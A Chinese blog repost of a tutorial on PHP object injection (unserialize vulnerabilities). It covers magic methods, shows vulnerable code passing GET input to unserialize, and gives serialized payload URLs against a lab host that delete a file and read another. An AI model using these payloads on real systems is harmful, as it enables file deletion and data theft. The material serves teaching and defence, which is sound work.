理解php反序列化漏洞

最新推荐文章于 2022-03-07 23:55:48 发布
最新推荐文章于 2022-03-07 23:55:48 发布
阅读量122 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/gongchixin/articles/8108957.html
版权

php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解的php概念。举个例子,1.php在一个类中定义了一个变量和一个方法。它创建了一个对象并且调用了PrintVariable函数,该函数会输出变量variable。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. class TestClass    
  4. {    
  5.     // 一个变量    
  6.      
  7.     public $variable = 'This is a string';    
  8.      
  9.     // 一个简单的方法    
  10.      
  11.     public function PrintVariable()    
  12.     {    
  13.         echo $this->variable;    
  14.     }    
  15. }    
  16.      
  17. // 创建一个对象    
  18.      
  19. $object = new TestClass();    
  20.      
  21. // 调用一个方法    
  22.      
  23. $object->PrintVariable();    
  24.      
  25. ?>   

 

php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的理解magic方法是如何工作的,在2.php中增加了三个magic方法,__construct, __destruct和__toString。可以看出,__construct在对象创建时调用,__destruct在php脚本结束时调用,__toString在对象被当作一个字符串使用时调用。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. class TestClass    
  4. {    
  5.     // 一个变量    
  6.      
  7.     public $variable = 'This is a string';    
  8.      
  9.     // 一个简单的方法    
  10.      
  11.     public function PrintVariable()    
  12.     {    
  13.         echo $this->variable . '<br />';    
  14.     }    
  15.      
  16.     // Constructor    
  17.      
  18.     public function __construct()    
  19.     {    
  20.         echo '__construct <br />';    
  21.     }    
  22.      
  23.     // Destructor    
  24.      
  25.     public function __destruct()    
  26.     {    
  27.         echo '__destruct <br />';    
  28.     }    
  29.      
  30.     // Call    
  31.      
  32.     public function __toString()    
  33.     {    
  34.         return '__toString<br />';    
  35.     }    
  36. }    
  37.      
  38. // 创建一个对象    
  39. //  __construct会被调用    
  40.      
  41. $object = new TestClass();    
  42.      
  43. // 创建一个方法     
  44.      
  45. $object->PrintVariable();    
  46.      
  47. // 对象被当作一个字符串    
  48. //  __toString会被调用    
  49.      
  50. echo $object;    
  51.      
  52. // End of PHP script    
  53. // 脚本结束__destruct会被调用    
  54.      
  55. ?>   

php允许保存一个对象方便以后重用,这个过程被称为序列化。为什么要有序列化这种机制呢?在传递变量的过程中,有可能遇到变量值要跨脚本文件传递的过程。试想,如果为一个脚本中想要调用之前一个脚本的变量,但是前一个脚本已经执行完毕,所有的变量和内容释放掉了,我们要如何操作呢?难道要前一个脚本不断的循环,等待后面脚本调用?这肯定是不现实的。serialize和unserialize就是用来解决这一问题的。serialize可以将变量转换为字符串并且在转换中可以保存当前变量的值;unserialize则可以将serialize生成的字符串变换回变量。让我们在3.php中添加序列化的例子,看看php对象序列化之后的格式。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. // 某类    
  4.      
  5. class User    
  6. {    
  7.     // 类数据    
  8.      
  9.     public $age = 0;    
  10.     public $name = '';    
  11.      
  12.     // 输出数据    
  13.      
  14.     public function PrintData()    
  15.     {    
  16.         echo 'User ' . $this->name . ' is ' . $this->age    
  17.              . ' years old. <br />';    
  18.     }    
  19. }    
  20.      
  21. // 创建一个对象    
  22.      
  23. $usr = new User();    
  24.      
  25. // 设置数据    
  26.      
  27. $usr->age = 20;    
  28. $usr->name = 'John';    
  29.      
  30. // 输出数据    
  31.      
  32. $usr->PrintData();    
  33.      
  34. // 输出序列化之后的数据    
  35.      
  36. echo serialize($usr);    
  37.      
  38. ?>   

为了使用这个对象,在4.php中用unserialize重建对象。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. // 某类    
  4.      
  5. class User    
  6. {    
  7.     // Class data    
  8.      
  9.     public $age = 0;    
  10.     public $name = '';    
  11.      
  12.     // Print data    
  13.      
  14.     public function PrintData()    
  15.     {    
  16.         echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
  17.     }    
  18. }    
  19.      
  20. // 重建对象    
  21.      
  22. $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');    
  23.      
  24. // 调用PrintData 输出数据    
  25.      
  26. $usr->PrintData();    
  27.      
  28. ?>   

magic函数__construct和__destruct会在对象创建或者销毁时自动调用;__sleep magic方法在一个对象被序列化的时候调用;__wakeup magic方法在一个对象被反序列化的时候调用。在5.php中添加这几个magic函数的例子。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. class Test    
  4. {    
  5.     public $variable = 'BUZZ';    
  6.     public $variable2 = 'OTHER';    
  7.      
  8.     public function PrintVariable()    
  9.     {    
  10.         echo $this->variable . '<br />';    
  11.     }    
  12.      
  13.     public function __construct()    
  14.     {    
  15.         echo '__construct<br />';    
  16.     }    
  17.      
  18.     public function __destruct()    
  19.     {    
  20.         echo '__destruct<br />';    
  21.     }    
  22.      
  23.     public function __wakeup()    
  24.     {    
  25.         echo '__wakeup<br />';    
  26.     }    
  27.      
  28.     public function __sleep()    
  29.     {    
  30.         echo '__sleep<br />';    
  31.      
  32.         return array('variable', 'variable2');    
  33.     }    
  34. }    
  35.      
  36. // 创建对象调用__construct  
  37.      
  38. $obj = new Test();    
  39.      
  40. // 序列化对象调用__sleep    
  41.      
  42. $serialized = serialize($obj);    
  43.      
  44. // 输出序列化后的字符串    
  45.      
  46. print 'Serialized: ' . $serialized . '<br />';    
  47.      
  48. // 重建对象调用__wakeup    
  49.      
  50. $obj2 = unserialize($serialized);    
  51.      
  52. // 调用PintVariable输出数据   
  53.      
  54. $obj2->PrintVariable();    
  55.      
  56. // 脚本结束调用__destruct     
  57.      
  58. ?>   


现在我们了解序列化是如何工作的,但是我们如何利用它呢?有多种可能的方法,取决于应用程序、可用的类和magic函数。记住,序列化对象包含攻击者控制的对象值。你可能在Web应用程序源代码中找到一个定义__wakeup或__destruct的类,这些函数会影响Web应用程序。例如,我们可能会找到一个临时将日志存储到文件中的类。当销毁时对象可能不再需要日志文件并将其删除。把下面这段代码保存为logfile.php。

[php]  view plain  copy
 
  1. <?php     
  2.      
  3. class LogFile    
  4. {    
  5.     // log文件名    
  6.      
  7.     public $filename = 'error.log';    
  8.      
  9.     // 储存日志文件    
  10.      
  11.     public function LogData($text)    
  12.     {    
  13.         echo 'Log some data: ' . $text . '<br />';    
  14.         file_put_contents($this->filename, $text, FILE_APPEND);    
  15.     }    
  16.      
  17.     // 删除日志文件    
  18.      
  19.     public function __destruct()    
  20.     {    
  21.         echo '__destruct deletes "' . $this->filename . '" file. <br />';    
  22.         unlink(dirname(__FILE__) . '/' . $this->filename);    
  23.     }    
  24. }    
  25.      
  26. ?>   

这是一个使用它的例子。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. include 'logfile.php';    
  4.      
  5. // 创建一个对象    
  6.      
  7. $obj = new LogFile();    
  8.      
  9. // 设置文件名和要储存的日志数据    
  10.      
  11. $obj->filename = 'somefile.log';    
  12. $obj->LogData('Test');    
  13.      
  14. // 脚本结束__destruct被调用somefile.log文件被删除  
  15.      
  16. ?>   

在其它脚本中我们可能找到一个unserialize的调用,并且参数是用户提供的。把下面这段代码保存为test.php。

[php]  view plain  copy
 
  1. <?php    
  2.      
  3. include 'logfile.php';    
  4.      
  5. // ... 一些使用LogFile类的代码...    
  6.      
  7. // 简单的类定义    
  8.      
  9. class User    
  10. {    
  11.     // 类数据    
  12.      
  13.     public $age = 0;    
  14.     public $name = '';    
  15.      
  16.     // 输出数据    
  17.      
  18.     public function PrintData()    
  19.     {    
  20.         echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
  21.     }    
  22. }    
  23.      
  24. // 重建用户输入的数据    
  25.      
  26. $usr = unserialize($_GET['usr_serialized']);    
  27.      
  28. ?>   

创建利用代码111.php。

[php]  view plain  copy
 
  1. <?php    
  2.   
  3. include 'logfile.php';    
  4.   
  5. $obj = new LogFile();    
  6. $obj->filename = '1.php';    
  7.      
  8. echo serialize($obj) . '<br />';    
  9.      
  10. ?>   

访问http://192.168.153.138/test.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";}。

显示已经删除了1.php。验证一下,果然成功删除了。

这就是漏洞名称的由来:在变量可控并且进行了unserialize操作的地方注入序列化对象,实现代码执行或者其它坑爹的行为。先不谈 __wakeup 和 __destruct,还有一些很常见的注入点允许你利用这个类型的漏洞,一切都是取决于程序逻辑。举个例子,某用户类定义了一个__toString为了让应用程序能够将类作为一个字符串输出(echo $obj),而且其他类也可能定义了一个类允许__toString读取某个文件。把下面这段代码保存为test.php。

[php]  view plain  copy
 
  1. <?php     
  2.      
  3. // … 一些include ...    
  4.      
  5. class FileClass    
  6. {    
  7.     // 文件名    
  8.      
  9.     public $filename = 'error.log';    
  10.      
  11.     // 当对象被作为一个字符串会读取这个文件    
  12.      
  13.     public function __toString()    
  14.     {    
  15.         return file_get_contents($this->filename);    
  16.     }    
  17. }    
  18.      
  19. // Main User class    
  20.      
  21. class User    
  22. {    
  23.     // Class data    
  24.      
  25.     public $age = 0;    
  26.     public $name = '';    
  27.      
  28.     // 允许对象作为一个字符串输出上面的data    
  29.      
  30.     public function __toString()    
  31.     {    
  32.         return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
  33.     }    
  34. }    
  35.      
  36. // 用户可控    
  37.      
  38. $obj = unserialize($_GET['usr_serialized']);    
  39.      
  40. // 输出__toString    
  41.      
  42. echo $obj;    
  43.      
  44. ?>   

访问http://192.168.153.138/test.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}。

 

但是如果我们用序列化调用FileClass呢?先建立一个1.txt。

创建利用代码123.php。

[php]  view plain  copy
 
  1. <?php    
  2.    
  3. include 'test.php';    
  4. $fileobj = new FileClass();    
  5. $fileobj->filename = '1.txt';    
  6.      
  7. echo serialize($fileobj);    
  8.      
  9. ?>   

访问http://192.168.153.138/test.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:5:"1.txt";}。

成功显示了文本内容。也可以使用其他magic函数:如果对象将调用一个不存在的函数__call将被调用;如果对象试图访问不存在的类变量__get和__set将被调用。但是利用这种漏洞并不局限于magic函数,在普通的函数上也可以采取相同的思路。例如User类可能定义一个get方法来查找和打印一些用户数据,但是其他类可能定义一个从数据库获取数据的get方法,这从而会导致SQL注入漏洞。set或write方法会将数据写入任意文件,可以利用它获得远程代码执行。唯一的技术问题是注入点可用的类,但是一些框架或脚本具有自动加载的功能。最大的问题在于人:理解应用程序以能够利用这种类型的漏洞,因为它可能需要大量的时间来阅读和理解代码。
原文地址:https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

转载于:https://www.cnblogs.com/gongchixin/articles/8108957.html

weixin_30415113
关注
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2854
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
PHP反序列化专题
goddemon
12-10 830
一,序列化基础知识类 魔术函数:即调用一些函数时,可直接自动调用这些函数 5种类型 __contstruct()函数:被称为构造函数,当实例化类的时候会自动调用该函数构造函数,即当对象创建new时会自动调用。但在反序列化时不会自动调用 __destruct()函数:被称为析构函数,当类结束(对象销毁)的时候自动调用该函数 __sleep()函数:当php进行序列化操作(serialize)的时候自动调用该函数,可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组。如果该方法未返回任何内容,则
php注入源码,深入讲解PHP的对象注入(Object Injection)
weixin_39562197的博客
03-10 549
前言虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP的序列化的不正确使用有关。如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。基础知识在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用,__destruct()会...
解析PHP对象注入漏洞
Exploit的小站~
02-03 3074
 0、前言 逛乌云知识库的时候看到一篇有趣的译文:http://drops.wooyun.org/papers/4820。 说的是一种注入方式,叫对象注入。对象也能注入? 是的,只要是存在污染数据,没有什么是不可能注入的,但是这个漏洞有点太古怪了,所以我觉得有趣。   1、原理 在程序编写的时候,往往需要序列化一些运行时数据,所谓序列化就是按照一定的格式将运行时数据写入本地文件。
PHP反序列化之练习题
shy的博客
11-29 1546
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
反序列化漏洞实例
buffedon的博客
06-10 1195
反序列化漏洞实例网页源码测试过程 网页源码 index.php <!DOCTYPE html> <body> <a href="../index.php">их╗п</a></body></html> <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_conte
理解PHP反序列化漏洞-漏洞银行大咖面对面22-berTrAM
01-08
类 : 对现实生活中一类具有共同特征的事物的抽象(即类可以说成是某一事物的代表,类归纳了事物); 对象 : 所说的事物就是对象; 属性 : 类中对象所具有的性质; 方法 : 可以用来操作该对象或者该对象可以使用...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
PHP反序列化漏洞.pdf
08-10
总的来说,PHP反序列化漏洞是一个复杂且危险的安全问题,开发者需要对对象的序列化和反序列化过程有深入理解,并采取合适的防护措施,以防止此类漏洞被攻击者利用。在编写和维护PHP代码时,应始终遵循最佳实践,进行...
php反序列化漏洞1
08-04
PHP反序列化漏洞是一种安全问题,它出现在PHP代码中对序列化对象进行反序列化时,如果对象的某些属性或方法可以被恶意控制,就可能导致意外的行为,甚至执行任意系统命令。这种漏洞通常源于对反序列化过程的不正确...
浅谈PHP反序列化漏洞原理
r0cky的博客
09-18 609
序列化与反序列化 序列化用途:方便于对象在网络中的传输和存储 0x01 php反序列化漏洞PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 序列化就是将对象转换为流,利于储存和传输的格式 反序列化与序列化相反,将流转换为对象 例如:json序列化、XML序列化、二进制序列化、SO...
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
关于反序列化漏洞的一些理解
才不是小弱鸡的博客
09-16 9538
  php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的...
php反序列化漏洞
BerL1n
01-27 284
2019-05-12 21:50 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解php概念。 这里先来了解一下什么是php序列化与反序列化? 序列化: 函数 : serialize() 把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 反序列化: 函数: unserialize() 恢复原先被序列化
php 删除public下面文件夹_最全的PHP反序列化漏洞理解和应用
weixin_39661345的博客
01-24 341
php反序列化漏洞,又叫php对象注入漏洞,是一种常见的漏洞,在我们进行代码审计以及CTF中经常能够遇到。01学习前最好提前掌握的知识PHP类与对象(https://www.php.net/manual/zh/language.oop5.php)PHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php)seriali...
[BUUCTF]刷题记录2
Huamang的博客
03-16 346
[GKCTF2020]老八小超市儿 搜shopxo的漏洞,知道管理员界面就是admin.php,默认账号密码是admin,shopxo 进入后台,在主题安装处发现了文件上传 把1.8.0的模板下载下来 插入shell 找到shell的地址,开蚁剑连接 找到flag 很遗憾是个假的flag,说真的flag在/root,但是我们没有权限访问 看到有个py文件在根目录 利用这个文件把root里面的flag提取出来 ...
php 反序列化漏洞概览
ReZero's Blog
04-23 869
个人感觉参数可控是很多安全问题的根源php反序列化漏洞原链接序列化是啥就理解成方便数据运输做的一种压缩优化就行比方说一个$stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new); echo "<br />"; print_r(unserialize($new)); 结果: a:3:{i:0;s
深入理解PHP反序列化漏洞
"这篇文档探讨了PHP反序列化漏洞,主要介绍了序列化和反序列化的概念,以及PHP中相关的函数和魔法方法,并提供了一个实例分析来说明这个问题在实际中的应用。" 在PHP编程中,序列化和反序列化是两个重要的操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值